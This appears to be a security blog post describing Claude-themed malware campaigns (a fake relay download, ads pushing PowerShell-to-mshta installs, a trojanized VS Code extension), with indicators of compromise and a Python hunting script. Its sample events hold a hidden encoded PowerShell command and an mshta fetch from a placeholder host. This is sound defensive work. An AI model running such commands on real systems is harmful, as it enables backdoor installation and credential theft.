Claude-Themed Malware Campaigns
Attackers Are Running at Least Four Separate Claude-Themed Malware Campaigns Right Now.
A fake site at claude-pro[.]com is advertising “Claude-Pro Relay”, pitched as a high-performance relay service for Claude Code developers. The only thing on it is a download button for a 505MB archive that installs a previously undocumented Windows backdoor Sophos calls Beagle, delivered via DonutLoader, alongside a PlugX chain via DLL sideloading. That’s one campaign. Three others are running concurrently.
Campaign 1: The PlugX installer (claude-pro[.]com, active since March 2026)
The MSI installer places files at C:\Program Files (x86)\Anthropic\Claude\Cluade\ (note the misspelling), mimicking a legitimate Anthropic installation path. A VBScript dropper copies NOVUpdate.exe, avk.dll, and an encrypted .dat file into the Windows Startup folder and launches the executable silently. Within 22 seconds, the process connects to 8.217.190[.]58 (Alibaba Cloud) over HTTPS and begins C2 communication. The VBScript then deletes itself to reduce forensic visibility.
Campaign 2: InstallFix via Google Ads (active now)
Attackers are buying Google Ads for “Claude Code” and “Claude Code install” searches, placing sponsored results at the top. Victims land on cloned install pages instructing them to run a PowerShell one-liner that chains into mshta.exe, fetching claude.msixbundle, a ZIP/HTA polyglot hiding a malicious HTML Application payload inside what appears to be a Microsoft-signed package.
Campaign 3: Claude Fraud (active since February 2026)
A trojanized VS Code extension posing as an official Claude Code plugin executes PowerShell silently on Windows, modifying Defender settings and downloading payloads. On macOS, sponsored ads lead to fake Claude documentation pages delivering the MacSync infostealer via ClickFix-style terminal commands. The campaign deliberately targets technically sophisticated users, developers and security practitioners, exploiting the trust those users place in recognized domains and in copy-paste terminal instructions.
Why Claude specifically
Claude’s growth to nearly 290 million web visits per month makes it an unusually attractive lure. Developers integrating AI tools have elevated permissions and routine access to credentials, CI/CD secrets, and internal systems. They’re also the users most likely to trust a curl-to-bash install command without reading it. That’s the attack surface all four campaigns are built on.
IOCs and detection
File IOCs: NOVUpdate.exe, avk.dll, NOVUpdate.exe.dat in C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\. Misspelled install path: \Cluade\. C2 IP: 8.217.190[.]58.
Process chains to hunt: Code.exe → powershell.exe → mshta.exe with a remote URL argument on developer workstations. Also monitor WScript.exe dropping executables into Startup paths, PowerShell with encoded commands, and AMSI tampering patterns.
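The three hunts above, expressed as rules over process-creation and file-creation telemetry. This is an added example written for this post, not tooling from Sophos or any vendor; the events, PIDs, paths and URL below are constructed placeholders, not indicators from the campaigns, and the rules assume Sysmon-style fields (parent PID, image, command line, target filename).

```python
import re

# Constructed Sysmon-style events (not real telemetry). PIDs, paths and the
# URL are illustrative placeholders; pid 1 stands in for an unlogged root.
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "Code.exe", "cmd": "Code.exe"},
    {"pid": 101, "ppid": 100, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -enc " + "QQBB" * 8},  # placeholder base64
    {"pid": 102, "ppid": 101, "image": "mshta.exe",
     "cmd": "mshta.exe https://installer.example/claude.msixbundle"},
    {"pid": 200, "ppid": 1, "image": "powershell.exe", "cmd": "powershell.exe -File build.ps1"},
    {"pid": 201, "ppid": 1, "image": "wscript.exe", "cmd": "wscript.exe C:\\Temp\\setup.vbs"},
]
FILE_EVENTS = [
    {"pid": 201, "image": "wscript.exe",
     "target": r"C:\Users\dev\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOVUpdate.exe"},
    {"pid": 200, "image": "powershell.exe", "target": r"C:\Users\dev\build\out.log"},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob of plausible length
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
REMOTE_URL = re.compile(r"(?i)\bhttps?://\S+")
STARTUP_DROP = re.compile(r"(?i)\\Start Menu\\Programs\\Startup\\[^\\]+\.(exe|dll|dat)$")

def ancestry(ev, by_pid):
    """Image names from the process up to the root, lower-cased."""
    chain = []
    while ev is not None:
        chain.append(ev["image"].lower())
        ev = by_pid.get(ev["ppid"])
    return chain

def hunt(process_events, file_events):
    """Return (rule_name, pid) tuples for every event matching a hunt rule."""
    by_pid = {e["pid"]: e for e in process_events}
    hits = []
    for ev in process_events:
        img, chain = ev["image"].lower(), ancestry(ev, by_pid)
        # Rule 1: editor -> PowerShell -> mshta.exe given a remote URL argument
        if img == "mshta.exe" and REMOTE_URL.search(ev["cmd"]) \
                and "powershell.exe" in chain and "code.exe" in chain:
            hits.append(("editor_powershell_mshta_remote", ev["pid"]))
        # Rule 2: PowerShell launched with an encoded command
        if img == "powershell.exe" and ENCODED_FLAG.search(ev["cmd"]):
            hits.append(("powershell_encoded_command", ev["pid"]))
    # Rule 3: WScript writing an executable/DLL/.dat into a Startup folder
    for fe in file_events:
        if fe["image"].lower() == "wscript.exe" and STARTUP_DROP.search(fe["target"]):
            hits.append(("wscript_drop_into_startup", fe["pid"]))
    return hits

if __name__ == "__main__":
    for rule, pid in hunt(PROCESS_EVENTS, FILE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign build-script PowerShell (pid 200) produces no hit, which is the point of requiring the encoded flag and the Startup path rather than alerting on the image name alone.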
Organizational controls: block sponsored search results for AI developer tools at DNS or browser level. Deploy Claude and developer tooling via MDM or vetted onboarding scripts rather than manual downloads. Any curl-to-bash or PowerShell one-liner install instruction gets the same scrutiny as an email attachment, no exceptions for tools the developer already trusts.
- Alex